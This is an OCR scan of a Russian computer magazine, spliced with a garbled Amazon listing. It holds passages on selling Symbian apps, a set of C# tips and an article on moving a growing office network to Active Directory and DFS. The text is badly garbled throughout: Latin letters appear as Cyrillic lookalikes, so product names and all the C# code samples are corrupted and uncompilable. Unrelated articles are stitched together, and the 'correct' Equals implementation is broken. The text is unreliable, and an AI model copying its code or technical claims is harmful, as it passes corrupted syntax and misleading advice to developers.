Рпсе; $50.60 & ІЫз ііет зЫрз Гог РКЕЕ ѵчііИ 8ирег 8аѵег ЗІіірріпд. РеІаіІБ 
Ѵоо Заѵв: $9.40 (16%) 

Іп Зіоск. 

ЗЫр5 Ггот апсі зоісі Ьу Дтагоп.сот. 6іЛ-кігар аѵаіІаЫе. 



\ѴапІ іі ОеІіѵегеО ѴѴесІпевсІау, РеЬгиагу 17? СЬоо$е Опе-Оау ЗНірріпд аі сЬескоиЬ ОеІаіЬ 
18 пей <гот $42.75 5 и^егі й-от $42.75 



5Наге ѵоиг омп сиі^отег ітааеа 

Книга, описывающая нетолько механизм портирования приложе- 
ний на ЗутЬіап, но и текущее положение дел на мобильном рынке. 
Также представлено описание ключевых технологий, лежащих в 
основе новой концепции ЗутЬіап 



данного подхода являлась привязка к конкрет- 
ным операторам (МТС, Билайн и Мегафон], а 
соответственно, и к географии распростране- 
ния ПО. 

Вполне логичным следующим шагом была бы 
реализация механизма ввода в приложении 
данных кредитной карты, что позволяло бы 
оплачивать программу пользователям креди- 
ток по всему миру. Но мне удалось наткнуться 
на разработку от финской компании ОрепЬТ, 
являющейся тем самым менеджером лицен- 
зий, который я собирался реализовывать 
самостоятельно. ОрепЬіІ: Бісепзе Мападег 
позволяет не только защитить программу от 
несанкционированного использования, но и 
оплачивать приложение по всему миру как с 
помощью кредитных карт, так и с помощью 
ргетіит зтз (у них заключены договора со 
100 операторами], что сильно экономит время 
разработчика. Единственный недостаток дан- 
ного менеджера лицензий — дороговизна. 

Его использование стоит 2500 евро в месяц 
плюс 10% от продаж. Поэтому окупаться он 
будет, только если у тебя есть более одного 
успешного продукта. Впрочем, как я уже писал, 
создание собственного менеджера лицензий 
также возможно. 

В любом случае очень важно иметь функцио- 
нал оплаты приложения непосредственно из 
самого приложения — 95% пользователей 
отказываются от покупки программы, если им 
необходимо для этого использовать компью- 
тер. Не забывай об этом. 

ПРОДВИЖЕНИЕ 

Итак, у нас готов продукт, в него интегриро- 
ван механизм оплаты, дальше что? Дальше 
нужно каким-то образом донести продукт до 
потребителя. Начать стоит, понятно дело, с 
собственного сайта, который должен быть как 
минимум на двух языках — русском и англий- 
ском. Помимо описания программ и ссылок 
на закачку неплохо бы там же сделать форум 
и регулярно проводить всякие акции вроде «В 
честь новогодних праздников скидка 50% на 
все продукты!», это поможет привлечь лояль- 
ную аудиторию. 



Но одним сайтом сыт не будешь, особенно 
вначале, поэтому необходимо освоить все 
возможные площадки по продаже мобильно- 
го софта. Среди них Напбапдо, ЗутЬіапдеаг, 
Сеіітапіа, и так далее. Большая часть из них 
работает по принципу покупки софта через 
компьютер, что автоматически делает их неэф- 
фективными. Но таких площадок много, поэто- 
му это именно тот самый случай, когда с миру 
по нитке хоть что-нибудь, да собирается. 

Среди публичных сервисов по продаже 
мобильного ПО выделяется Оѵі Зіоге от ІЧокіа. 
Несомненным плюсом его для разработчика 
является то, что он предустановлен во все 
современные смартфоны ІЧокіа. Пользователь 
может загрузить необходимый ему софт через 
встроенный в телефон каталог. Данный канал 
продаж является обязательным для использо- 
вания любым ЗутЬіап-разработчиком. 

Среди отечественных интернет-магазинов 
ПО хотелось бы отдельно отметить 5оіі:кеу. 

Это, пожалуй, единственный отечественный 
интернет-магазин, реально озабоченный 
повышением продаж, включая продажи софта 
для мобильных устройств. В частности, при- 
мечательна совместная акция 5оіі:кеу и ІЧокіа: 
теперь в фирменных салонах ІЧокіа по всей РФ 
потребители могут купить не только телефон, 
но и сразу установить в него мобильное ПО. 

На момент написания статьи в салонах ІЧокіа 
представлены и мои продукты, уровень продаж 
сопоставим с зарплатой выпускника института 
в Москве. Согласись, неплохой бонус к основ- 
ным продажам. Сразу хочу сказать: не стоит 
ожидать, что после того, как ты напишешь 
программу, распространители ПО накинутся на 
тебя с предложениями продавать ее. Тебе при- 
дется со всеми ними договариваться, нередко 
— долго и упорно. В любом случае, старайся 
выжать из каждого канала продаж максимум, 
не пускай все на самотек. Тогда и результат 
будет вполне осязаем. 

Описанные выше каналы распространения 
можно назвать традиционными. Как и все тра- 
диционное, они обеспечивают прогнозируемый 
результат, который сложно назвать выдающим- 
ся. Продажа ПО через интернет-магазины — 
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Попробуйте бесплатно 

Осталось дней: 2 

Купить 9 0-дн. лицензию 

Цена 128,84 руб 

Купить 30-дн. лицензию 

Цена 67,38 руб 

Купить полную лиценз. 

Цена 202,14 руб 
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Менеджер лицензий в действии 



это обязательный элемент продвижения про- 
дукции, но что действительно приносит доход, 
так это предустановка программ в большие 
партии мобильных устройств (так называемый 
рге-іоасііпд). Делается это по договоренности 
с дистрибьютором телефонов или, если очень 
повезет, с производителем. В крупную партию 
телефонов предустанавливаются триальные 
версии твоих продуктов, что обеспечивает 
внушительный денежный поток. С дистри- 
бьюторами договариваться сложно и обычно 
приходится работать через посредника. В моем 
случае мне удалось через ОрепЬИ; попасть в 
50000 мобильных аппаратов в Великобритании. 
Повторюсь еще раз — все зависит от твоих 
способностей и желания договариваться с 
партнерами. Как я уже писал ранее, именно это 
— самая ответственная часть работы, отнимаю- 
щая бОльшую часть времени. 

стоит ли ОНО ТОГО? 

Все зависит от того, чего ты ожидаешь. 
Разрабатывая и продавая свой софт самостоя- 
тельно миллионером стать вряд ли возможно. 

А вот обеспечить себе адекватный доход и 
получить при этом возможность реализовывать 
свои собственные идеи и самостоятельно рас- 
поряжаться своим временем — да. Я, напри- 
мер, очень комфортно себя чувствую в каче- 
стве независимого разработчика и с ужасом 
вспоминаю те времена, когда сидел в офисе и 
выполнял задачи, поставленные мне офисным 
планктоном более высокого ранга. 

Другое дело, что многим программистам 
интересно заниматься исключительно про- 
граммированием, а весь этот маркетинг и 
продвижение им чуждо. Мне повезло, что как 
раз последнее вызываету меня много больший 
интерес, чем разработка, так что проблем нет. А 
вотеслитебе интересна только разработка, то 
есть смысл уйти под крыло компании, которая 
профессионально занимается продвижени- 
ем ПО, забирая себе определенный процент 



от прибыли. Обычно у таких компаний уже 
выстроены все цепочки продаж и имеется 
внушительная база клиентов. В частности этим 
занимается 5В5Н ЗоЛѵѵаге ( ЬЛрТ/вЬБП.пеЦ . 

Они берут продукт и продаютего через свои 
каналы, забирая 30% от прибыли. При этом ты 
по-прежнему сам занимаешься разработкой и 
формированием концепции продукта, незабо- 
тясь ни о чем кроме этого. Тем не менее, у этой и 
удругиханалогичных компаний есть проблемы, 
сужающие круг потенциальных пользовате- 
лей. Я имел опыт работы с ними, но в итоге от 
сотрудничества отказался, поскольку после 
перевода одного из продуктов к ним уровень 
его продаж не изменился. 

НТО НАСЧЕТ 

ОСТАЛЬНЫХ ПЛАТФОРМ? 

Строго говоря, материал, изложенный выше, 
применим к любым платформам. Тем не менее, 
хотелось бы высказаться по поводу целесоо- 
бразности разработки для каждой из них. 
ѴѴіпбоѵѵз МоЬіІе — под эту платформу написано 
больше всего софта, поскольку принципы и 
методы разработки под нее мало чем отлича- 
ются от разработки под настольную ѴѴіпбоѵѵз. 
Поэтому разработчики накинулись на ѴѴМ, при- 
меняя накопленные знания. Данная ОС с каж- 
дым годом теряет позиции на рынке и, я наде- 
юсь, скоро окончательно исчезнет (по-моему, 
очень зря надеешься — прим. ред.]. Поэтому я 
бы не советовал тратить на нее время. 
іРЬопе — после ЗутЬіап вторая, на мой взгляд, 
по перспективности платформа, отличающаяся 
очень четко определенной схемой дистрибью- 
ции ПО — это возможно только через АррЗіюге 
(не надо мне говорить про ]аіІЬгеак — этим 
занимаются только студенты 1-3 курсов в РФ), 
которая является как плюсом, так и минусом 
данной платформы сточки зрения разработ- 
чика. Минус в том, что уровень продаж софта 
через него сложно прогнозируем и сильно 
зависит от обстоятельств. 



Апбгоіб — потенциал этой платформы на мой 
взгляд очень сильно, переоценен. Да, смотрит- 
ся красиво, но это единственное, чем данная 
платформа на данный момент выигрывает у 
ЗутЬіап. После выхода 5утЬіап л 4 различия 
в интерфейсе будут минимизированы, а вот 
функциональная мощь ЗутЬіап останется. Да 
и среда, базирующаяся на Заѵа, тоже не вызы- 
вает энтузиазма у серьезных разработчиков. 
ВІаскЬеггу — относительно узкий рынок и, 
опять же, Заѵа. То есть, писать игры получится, 
а системные утилиты — нет. Маето — новая 
платформа от, фактически, ІЧокіа. Платформа 
очень интересная, но пока еще слишком моло- 
дая, чтобы можно было говорить о ее перспек- 
тивности. Мало устройств, мало пользователей 
и, следовательно, малый потенциальный доход 
с продаж. Цаѵа2МЕ — идеальный вариант для 
разработчика простых игр. Для всех остальных 
— бесполезная технология. 

Любая более-менее крупная софтверная ком- 
пания, занимающаяся разработкой ПО для 
мобильных устройств, обязана стараться осво- 
ить как минимум три из этих платформ. Если 
же ты одиночка, то выбери одну и не распыляй 
свои силы. 

ЗАКЛЮЧЕНИЕ 

В данной статье я очень схематично расска- 
зал о том, чем предстоит заниматься неза- 
висимому разработчику ПО для мобильных 
устройств, желающему продавать свой софт. 
Прямо скажем, что материал здесь освещен 
не полностью и тебя ожидает масса под- 
водных камней, если ты решишь пойти по 
этому пути. Тем не менее, Рим тоже строился 
не за один день, поэтому не отчаивайся, 
если все это кажется слишком сложным. 
Читай побольше мотивирующей и бизнес- 
литературы, это даже важнее, чем книжки по 
программированию. Ни один бизнес не стро- 
ится с нуля легко и непринужденно. Но полу- 
чаемый на выходе результат стоит того, т 
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ПРОГРАММЕРСКИЕ 

ТИПСЫИТРИКСЫ 



Потайные ходы в подземелье С# 

ГОВОРЯТ, ЛЕНЬ - ДВИГАТЕЛЬ ПРОГРЕССА. У ТЕБЯ ТОЖЕ ЕСТЬ СВОЙ 
ДВИГАТЕЛЬ ПРОГРЕССА - ЖУРНАЛ КОТОРЫЙ ПОСРЕДСТВОМ 

ЭТОЙ СТАТЬИ ПОМОЖЕТ ТЕБЕ СДЕЛАТЬ КОД НА С# ПРЕДМЕТОМ 
ЗАВИСТИ И ВОСХИЩЕНИЯ СОБРАТЬЕВ ПО ЦЕХУ:). 



Сегодня я постарался рассмотреть некоторые 
малоизвестные широкой публике моменты, 
связанные с программированием на С#, кото- 
рые помогуттебе избежать некоторых ошибок 
и сделать твои приложения гораздо более 
гибкими и адекватными. 

Константы и поля 
«только для чтения» 

В стандарте С# предусматриваются поля и 
константы геабопіу («только для чтения»]: 

риЫіс геайопіу іпС КеайопІуѴаІие = 1; 
риЫіс сопзС іпР СопзСѴаІие = 1; 

В чем же между ними разница? Константы 
вычисляются на стадии компиляции про- 
граммы, а значения «геабопіу» — только на 
стадии выполнения программы. Неочевидные 
последствия такого отличия могут проявиться 
в том случае, когда, скажем, библиотека и 
использующая ее программа компилируются 



отдельно. Если в библиотеке нужно использо- 
вать константу, то при изменении еезначения 
(перекомпиляции библиотеки], нужно будет 
пересобирать и саму программу. При исполь- 
зовании простых геабопіу-полей, перекомпи- 
лировать программууже не нужно. 

Оператор «15» или ме- 
тод І$5иЬсІа$$0і()? 

Какая разница при использовании оператора 
із и метода ІзЗиЬсІаззОШ? Ведь, казалось бы, 
оба они несут одну итуже функциональность? 
Во-первых, вызов оператора із проходитна 
порядок быстрее, посколькуон компилируется 
в простую инструкцию М5ІЕ«азсІаз5», тогда как 
вызов метода ІзЗиЬсІаззОШ проходит гораздо 
дольше. Оператор із может вызываться в случае, 
когда первый операнд равен «пи И», тогда как 
вызвать ІзЗиЬсІаззОШ утакого объекта не по- 
лучится. И наконец, оператор із работает какс 
классами, так и с интерфейсами, вто время как 
ІзЗиЬсІаззОШ может работать только с классами 



Разбираемся 
с приведением типов 

В С# существуют два вида приведения 
типов: использованием оператора «аз» и 
прямое приведение. Практика показывает, 
что в коде гораздо предпочтительнее ис- 
пользовать прямое приведение типов и вот 
почему. 

Если система по какой-то причине от- 
кажется проглатывать прямое приведение 
типов, то будет сгенерировано исключение 
ІЧиІІРеіюгепсеЕхсерЕоп, тогда как оператор 
аз просто вернет пи Ц. 

Во втором случае существует боль- 
шая вероятность, что после получения 
нулевой ссылки от оператора аз, где- 
то глубоко в недрахтвоей програм- 
мы будет сгенерировано исключение 
ІЧиЦРеіюгепсеЕхсерЕоп, отыскать при- 
чины которого будет уже не так-то просто. 
В случае прямого приведения типов при- 
чина ошибки будет очевидной. 
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Параметры компилятора 


И-код компилятора 


Машинный ЛТ-код 


/орііпше - 

/<ІеІмід“ 

(значения по умолчанию) 


Н е о пти ми з ир о в ан н ы и 


О пти м и з и р о в ан н ы н 


/орйпііге- 

/* ІеЬид (+/ЛіІІ /ріііюіѵіу) 


Не опти м и з ир о в ан ны й 


Неолтишізкрованкый 


/оріітіге+ 

/ііеінід 4- /+ /АіІІ /ріііюпіу | 


О пти м и з и р о в ан н ы и 


Оптимизированный 



ИСПОЛЬЗОВАНИЕ ПАРАМЕТРОВ /ОРТІМІ2Е И /ОЕВІІО 



Разница между полем 
и свойством в С# 

Оченьчасто возникаетвопрос: «а вчем разница междуполем и 
свойством в С#»? Сточки зрения доступа — обычное поле и свойство с 
доступом деі/зеі: ничем не отличаются. Поэтому, ответ на вопросы «что 
предпочтительней» и «какименно использовать»зависитот контекста 
программы. 

Во-первых, использование свойства нужно, когда необходимо при уста- 
новке свойству определенного значения, выполнить какие-то действия: 

зеВ { рагаті = ѵаіие; БоЗотеШгкОпСЬапдес! ( ) ; } 

Во-вторых, использование свойства требуется в том случае, когда нуж- 
но проверить присеваемое свойству значение: 

зек { ІВ (ѵаіие > 0) рагаті = ѵаіие; } . 

Ну и в-третьих, использование свойства целесообразно, когда значение 
свойства не хранится в классе, а, например, считывается из базы 
данных: 

деВ { геВигп КеасВРогтБВ («рагаті») ; } 

зеВ { МгіВеТоБВ («рагаті» , ѵаіие); } 

Перехват ѴѴіп32-сообщений 

Часто втвоем приложении возникает необходимость перехватить и 
использовать для своих нужд сообщения ѴѴіп32. Какэто сделать на 
С#? Очень легко — достаточно задействовать в своем коде интерфейс 
ѴѴіпбоѵѵз.Рогтз.ІМеззадеРіІІег. Параметры сообщения будут доступны в 
свойствах т.І_Рагат и т.ѴѴРагат: 

Ловим ѴѴіп32-сообщения 

риЫіс сіазз Міп32МеззадеРіІВег : 



ЗузВет. ЭДіпсІсжз . Рогтз . ІМеззадеРіІВег 
{ 

риЫіс Ьооі МеззадеРіІВег (геВ Меззаде т) 

{ 

//клик левой кнопкой мыши 
ІВ (т.Мзд == 513 ) 

{ 

МеззадеВох. БРютл ( "ЭДіпЗ'.2 теззаде Ш_ЬВитТ0Ш0ШГ " ) ; 
геВигп Вгие; 

} 

геВигп Ваізе; 

} 

} 

зВаВіс Міп32МеззадеРіІВег ВіІВег = 
пеѵі Ѵ/іп32МеззадеРіІВег ( ) ; 
зВаВіс ѵоісі Маіп ( ) 

{ 

АррІісаВіоп. АскіМеззадеРіІВег ( ВіІВег) ; 

АррІісаВіоп . Кип (печл Рогті ( ) ); 

} 

Недостаток этого перехвата в том, что тебе придется расшифровывать 
сообщения по их коду. 

Защита от переполнения - ключе- 
вые слова сНескесІ и ипсНескесІ 

В С# существуют такие ключевые слова — сбескеб и ипсЬескеб, ис- 
пользование которых поможет предотвратить переполнение целого и 
повысить безопасность твоего кода. Можно объявить сбескеб-блок: 

Контролируем переполнение целого числа 

ЪуВе а = 1; 

ЪуВе Ь = 2 55 ; 
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скескесі 

{ 

Ъуке с = ( Ъуке ) ( а + Ъ ) ; 

Ъуке Ъ = Сопѵегк . ТоВуке ( а + Ь); 

Сопзоіе . ШгікеЬіпе ( " {0} { 1 } " , Ъ + 1, с ); 

} 

В данном случае, приведение (а + Ь) от іпѣ к Ьуіе приведет к исклю- 
чению. В строке с СопѵегЪТоВуІе, исключение возникло бы и без 
ключевого слова сЬескесІ, но его наличие привод итк возникнове- 
нию исключения еще и при вычислении аргументов метода Сопзоіе. 
ѴѴгіІеЫпеО. Поскольку иногда переполнение целого числа допу- 
скается намеренно, то имеется ключевое слово ипсбескеб, которое 
отключает контроль за переполнением. Ключевые слова сбескеб и 
ипсбескеб можно использовать для включения/отключения контро- 
ля в одном выражении: 

сЪескеЪ ( с = ( Ъуке ) ( Ь + а ) ) . 

Наконец, можно включить контрольза переполнением с помощью 
флага «/сбескеб» компилятора — если этот флаг присутствует, то нужно 
явно помечать словом ипсбескеб те участки кода, где переполнение 
допустимо. 

РАВЕНСТВО И ТОЖДЕСТВО ОБЪЕКТОВ 

Очень часто разработчикам приходится писать код для сравнения двух 
объектов (к примеру, при поиске, сортировке и сравнении отдельных 
элементов набора (массива]. Справедливости ради надо сказать, что 
с определением равенства и тождественности в .ЫЕТ Ргатеѵѵогк дела 
обстоят не совсем ладно. 

Утипа 5уз1:ет.0Ь]ес1:есть метод Едиаіез, который возвращает Іхие для 
двух «равных» объектов. Вот как выглядит стандартная реализация 
этого метода в типе ОЬіесЪ 

Стандартная реализация метода Ециаіз 

риЫіс сіазз СЪдеск 
{ 

риЫіс ѵігкиаі Вооіеап Едиаіз ( СЪдеск оЪд ) 

{ 

ік( кЪіз == сЪд ) гекигп кгие; 
гекигп каізе; 

} 

} 

Код выглядиточень просто, однако возникает вопрос — а если аргумен- 
ты ссылаются на разные объекты? В таком случае методу Едиаіз гораздо 
сложнее определить, содержатли объекты одинаковое значение. 

Иначе говоря, указанная выше реализация метода Едиаізутипа 0Ь]есІ 
реализует проверку на тождество, но не равенство и поэтому никуда не 
годится. Поэтому сейчас мы напишем свой, грамотный вариант реали- 
зации метода Едиаіз: 

Грамотная реализация метода Ециаіз 

риЫіс сіазз СЪдеск 
{ 

риЫіс ѵігкиаі Вооіеап Едиаіз ( Окдеск оЪд ) 

{ 

ік ( окд == пиіі ) гекигп каізе; 
ік ( кЫз . СекТуре ( ) != сЪд . СекТуре ( ) ) 

гекигп каізе; 



гекигп кгие; 

} 

} 

Этот метод вполне может использоваться для переопределения метода 
ЕдиаЫ) в твоем коде для получения равенства типов. Для проверки на 
тождественность в .ЫЕТ предусмотрен метод, и ты его, уверен, знаешь — 
0Ь]ес1. РекегепсеЕц иа Із(] . 

НЕМНОГО ОБ ОПТИМИЗАЦИИ КОДА 

Существует два параметра компилятора С#, которые влияют на опти- 
мизацию кода — /орбтіге и/бебид. В приведенной таблицеты можешь 
увидеть варианты их использования — как говорится, «почувствуйте 
разницу» 

Еслитвои эксперименты покажут, что ЛТ-компилятор СИ? не обеспе- 
чивает нужной производительности, воспользуйся утилиткой пдеп.ехе, 
поставляемой в комплекте .ЫЕТ ЕгатеѵѵогкЭОК. Она компилирует весь 
Іб-код выбранной сборки в машинный код и сохраняетего на диске. При 
запуске сборки, СЪР автоматически проверит наличие предварительно 
скомпилированной версии сборки, и, если она есть, загрузитее, про- 
пустив предварительную компиляцию. 

К ВОПРОСУ О ПОТОКАХ 

Не могу не затронуть вопрос об эффективном использовании потоков в 
приложении — часто приходилось видеть, как из мощного оружия улуч- 
шения производительности, злоупотребления с потоками приводили к 
обратному результату. Если говорить точно, то использование потоков 
всегда приводит к издержкам в работе системы, потому что процессор 
тратитуйму времени и ресурсов при создании потоков и переключении 
контекста между ними. С появлением многопроцессорных (многоядер- 
ных) систем эта проблема отошла на второй план («правильно, а чего 
мелочиться с потоками, у меня четыре проца их проглотят и не подавят- 
ся ;]»), нотем не менее, грамотное использование поточных моделей в 
.ЫЕТ-приложениях будет играть на руку разработчику, не говоря уже о 
росте его профессионализма. 

В .ЫЕТ существует готовое решение для управления собственным 
пулом потоков. Пул потоков позволяет разработчику найти золотую 
середину — с одной стороны, малое число потоков экономит ресурсы, 
а большое — позволяет со всем размахом воспользоваться преиму- 
ществами многопроцессорных систем; Пул потоков просто приспоса- 
бливается ктекущей ситуации: если нужно выполнить много задач и 
в системе есть больше одного процессора, СЪР создаст новые потоки. 
При уменьшении загруженности, количество потоков будетуменьшено. 
И тут в руки программиста попадают методы регулирования их количе- 
ства — ЭеіМахТЬгеасІз и ОеіМіпТЬгеасІз. Как правило, практика показы- 
вает, что на работу приложения очень негативно влияет вызов функции 
ЗеіМахТЬгеасІз, потому что манипуляции с максимальным количеством 
потоков ухудшают, а неулучшают производительность приложения. 
Если же тебе в приложении требуется больше 25 потоков на процессор, 
то следует задуматься об архитектуре программы и способах использо- 
вания потоков в ней. 

Вместе с этим, стоит отметить, что в СбВ заложен механизм предотвра- 
щения слишком частого создания потоков — разрешается создавать не 
более одного потока в 500 мс. Если тебя такой вариант неустраивает, 
в приложение можно добавить вызов ЗеіМіпТЬгеасІз, которому можно 
передать минимальное допустимое число потоков в пуле. Пул быстро 
создастуказанное число потоков, а если при появлении в очереди но- 
вых заданий все потоки будутзаняты, он продолжитсоздание потоков 
со скоростью не более одного потока в 500 мс. нс 
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СПРАВЛЯЕМСЯ С ПРОБЛЕМАМИ РОСТА 
ВНУТРИКОРПОРАТИВНОЙ СЕТИ 

Редко в небольших компаниях при установке нескольких компьютеров 
задумываются о будущем расширении. Как правило, строится одно- 
ранговая рабочая группа, где каждая система работает независимо от 
других. Но по мере роста сети управлять всем парком становится все 
труднее, и приходится прилагать большие усилия, чтобы не потерять 
контроль. Поэтому рано или поздно придется принимать решение по 
кардинальному переустройству всей сетевой инфраструктуры, чтобы 
сделать ее более гибкой и управляемой. 



ПЕРЕХОД НА АСТІѴЕ РІКЕСТОКУ Число ком- 
пьютеров в подчинении админа может расти 
по-разному. Это может быть постепенное уве- 
личение количества и качества систем по мере 
развития компании. Начинают появляться 
мобильные компьютеры, выделенные сервера, 
новые сотрудники (а значит, новые рабочие 
станции), начальство дергает, заставляя под- 
нять ѴѴіРі, чтобы гости могли свободно выйти в 
интернет. Становится необходимым отдельное 
хранилище файлов, к которому можно бы было 
получить доступ удаленно и в любое время су- 
ток. Появляется необходимость в терминаль- 
ном доступе, чтобы с одной копией 1С могли 
работать несколько человек. И так далее, 
список новых задач можно продолжать. Парк 
разрастается, а админ начинает наматывать 
все больше и больше километров по этажам. В 
такой ситуации хочешь-не хочешь, а приходит- 
ся думать об оптимизации своего труда. Еще 
интереснее бывает в том случае, когда рост 
количества систем произошел скачкообразно. 
Например, в результате слияния или объ- 
единения ресурсов нескольких более мелких 
структур, в которых уже имеются свои сервисы 
и, возможно, специфические протоколы и при- 
ложения. И главное: заведен определенный 
порядок, к которому привыкли пользователи, 
и который нежелательно кардинально менять. 
Как бы то ни было, но в любом случае тебя ждут 
определенные трудности и придется заранее 
предусмотреть все свои действия и рассчитать 



время. Мы не будем рассматривать процесс 
возможной миграции на свободные ОС, а 
также массовое наращивание вычислитель- 
ной мощности систем. Постараемся обойтись 
имеющимся железом, объединяя доступные 
вычислительные ресурсы. 

Вполне естественным в случае роста компании 
будет переход на доменную структуру. В этом 
случае достигается требуемая централизация 
настроек, можно легко организовать правиль- 
ный доступ к сетевым ресурсам, интернету, 
контролировать на клиентских ОС настрой- 
ки и наличие только нужных пользователю 
приложений. Процесс поднятия контроллера 
домена со всеми тонкостями уже описывался 
в журнале (см. «Первый шаг навстречу Асгіѵе 
Эігесгогу» в ] [ 04.2007 и «В лабиринте АЭ» ] [ 

1 1.2008), поэтому остановимся лишь на основ- 
ных рабочих моментах. 

Прежде, чем установить роль «Доменные служ- 
бы Асгіѵе ЭігесГогу», запустить мастер установ- 
ки доменных служб Асгіѵе ЭігесГогу (бсргото) 
и подключить к домену компьютеры пользова- 
телей, следует собрать информацию от пользо- 
вателей следующего характера: ФИО, сетевое 
имя системы (текущее и желаемое), логин, 
пароль (для первого входа), список программ, 
необходимость доступа к сетевым ресурсам, 
использование интернет-сервисов, местона- 
хождение компьютера. Такая бумага с одной 
стороны поможет лучше сориентироваться и 
более качественно подготовиться к переходу, с 



другой стороны является своего рода подстра- 
ховкой, чтобы пользователь потом не жало- 
вался, почему у него вдруг перестала работать 
аська. Особое внимание уделяем структурам 
организации, в которых используется специ- 
фическое ПО. В первую очередь, бухгалтерии, 
где и «своих» программ более чем предостаточ- 
но, и представители этого отдела, как правило, 
не могут внятно объяснить, что им действи- 
тельно нужно, и как они там вообще работают. 
Но чуть что случись, гнев начальства обрушит- 
ся, естественно, на админа. Далее ставим КД и 
тестируем подключение к домену одной-двух 
систем, если проблем не обнаружено, заводим 
последовательно всю сеть. Так как после ввода 
в домен пользователь уже не будет являться ло- 
кальным администратором, могут возникнуть 
грабли с доступом к некоторым данным на 
ШТЗ разделе, возможно, перестанут запус- 
каться программы, или окажутся недоступ- 
ными некоторые файлы настроек и данных. 
Первый вход под учетной записью пользовате- 
ля должен сделать сам администратор, чтобы 
убедиться, что все работает. При необходимос- 
ти нужно скорректировать параметры досту- 
па. Чтобы в первые дни не бегать лишний раз, 
лучше сразу активировать удаленный доступ 
к компьютерам по КЭР или настроить любой 
другой способ, если это не было сделано ранее 
(об удаленном управлении ѴѴіпсІоѵѵз читай в 
статье «Незримое присутствие», опубликован- 
ной в предыдущем номере ] [) . 
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В качестве контроллера домена нужно использовать только выделен- 
ный сервер, с минимальным количеством ролей (в небольших органи- 
зациях обычно этой рекомендацией пренебрегают, но тут уж ничего 
не поделаешь) . Учитывая, что КД является сердцем сети, необходимо 
гарантировать отказоустойчивость и доступность сервиса, поэтому КД 
должно быть два. В удаленных филиалах, имеющих большое количест- 
во компьютеров, также желательно присутствие «своего» КД, который 
будет реплицировать данные с основного КД. Лучше, если это будет 
контроллер домена только для чтения (Кеаб-Опіу Ботаіп Сопігоііег, 
КОБС), при его использовании пользователи смогут без проблем 
регистрироваться даже при отсутствии доступа в интернет, а компро- 
метация или кража КОБС не повлечет нарушения функционирования 
всего леса. 

Наверное, не стоит даже напоминать о необходимости создания резерв- 
ной копии перед проведением важных перестроек. 

ХРАН Е Н И Е ДАН Н ЫХ При небольшом количестве компьютеров и 
малом объеме общих данных пользователи обычно обмениваются фай- 
лами через гостевые папки. Расширение количества систем заставляет 
задуматься о доступности информации и более эффективном хранении 
данных, ведь при множественных сетевых подключениях компьютер 
начинает ощутимо тормозить. Здесь самое время вспомнить о распре- 
деленной файловой системе (БізІігіЬиІіесі Рііе Зузііет, БРЗ). Пользова- 
тель получит более прозрачный механизм доступа к сетевым ресурсам, 
ведь все общие ресурсы будут объединены в единое пространство имен, 
и не нужно будет каждый раз искать компьютер, на котором находят- 
ся нужные файлы. Учитывая, что данные одновременно хранятся на 
нескольких компьютерах с автоматической репликацией, получаем 
возможность более равномерно распределить нагрузку и увеличить 
доступность данных, в случае выхода из строя одной из систем, где 
находился сетевой ресурс. Репликация использует механизм, полу- 
чивший название удаленное разностное сжатие (Кетоне Оійегепйаі 
Сотргеззіоп — КОС) , при котором по сети передаются лишь различия, 
что уменьшает трафик. Отслеживается актуальность содержимого, 
поэтому сервер, который долгое время был недоступен, не сможет 
переписать обновленные данные. 

В принципе, БР5 можно активировать и без Асгіѵе Оігесногу в режиме 
Знапсіаіопе (автономный), но в таком случае не используется репли- 
кация, а доступность данных будет зависеть от работоспособности 
сервера, хранящего информацию о структуре ЭРЗ. 



В статье «Страж файлового дерева», опубликованной в декабрьском 
номере ] [ за 2007 год, подробно говорилось о реализации БР5 на 
ѴѴіп2кЗ. В \Уіп2к8/К2 у ЭРЗ появились новые возможности, и немного 
изменился принцип настроек. Так БР5 реализован в виде сервисной 
роли файловых служб. Для установки следует активировать роль 
«Файловые службы» и затем на этапе выбора служб ролей включить два 
пункта «Пространства имен БР5» и «Репликация БР5». На следующем 
шаге мастера можно создать пространство имен или отложить этот шаг 
и организовать Натезрасе при помощи консоли. Затем следует выбрать 
тип создаваемого пространства имен. Так как у нас используется Асгіѵе 
ОігесЮгу, тип «Изолированное пространство имен» нам не подходит. 
Поэтому отмечаем «Пространство имен на основе домена» и переходим 
к следующему шагу, где указываем учетную запись (должна входить в 
группу админов домена), от имени которой мастер будет выполнять 
все настройки. И, наконец, последняя установка позволяет добавить 
сетевые папки в пространство имен. Просто выбираем систему, затем 
сетевой ресурс и указываем имя. По окончании нажимаем Установить и 
ожидаем завершения работы мастера. 

В консоли все делается проще: 

> ЗегѵегМападегСтсІ -іпзБаІІ РЗ-БРЗ РЗ-БРЗ-Батезрасе \ 
РЗ-БРЗ-Кер1ісаБіоп 

Дальнейшая настройка производится при помощи консоли БР5, ярлык 
для запуска которой находится в меню Администрирование. В частнос- 
ти, рассмотрим, как настроить реплицирование данных. Добавляем 
еще один объект, который в пространстве имен ЭРЗ будет связан с 
текущей папкой. Выбираем в окне консоли первую папку и в контекс- 
тном меню пункт «Добавить конечный объект папки», указываем еще 
один сетевой ресурс. Мастер запросит создать группу репликации для 
выбранных объектов, соглашаемся. В дальнейшем, при добавлении 
новых папок в группу, настроить репликацию можно будет при помощи 
мастера репликации папок. 

В некоторых ситуациях необходимо изменение файлов, расположен- 
ных в одной сетевой папке, остальн ые используется лишь для доступ- 
ности и резервного копирования. В БРЗ, реализованной в ѴѴіп2к8, эта 
задача решается просто, достаточно установить нужную папку в режим 
«Только чтение». Папки для чтения предназначены только для репли- 
цирования в них данных, которые не нужно менять. Это могут быть 
отчеты, файлы установки, да и, в принципе, любые файлы (например. 
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Настройка пространства имен при добавлении роли РР5 



веб-сервера, о чем ниже), если такая необхо- 
димость возникла. Для включения режима для 
чтения выбираем группу репликации, пере- 
ходим во вкладку Членства и, выбрав нужную 
сетевую папку из контекстного меню, щелкаем 
«Сделать доступным только для чтения». 
Пользователи, обращающиеся к сетевым 
ресурсам, видят список всех ресурсов, часто 
тех, к которым они не должны иметь доступа. 



Это отвлекает их от работы, они пытаются от- 
крыть такую папку или файл. При этом службы 
аудита заносят в системный журнал большое 
количество варнинговых сообщений. Еще 
один неприятный момент: если пользователь 
увидит файл типа «Уволить. бос» он, естествен- 
но, будет нервничать и создавать нерабочую 
обстановку. Новая функция — перечисле- 
ние на основе доступа (ЕпаЫе Ассезз-Вазеб 



Полезные инструменты 
при переходе на Асііѵе 
Бігесогу 

Переход на Асііѵе Бігесіюгу представляет собой достаточно трудоемкий процесс, 
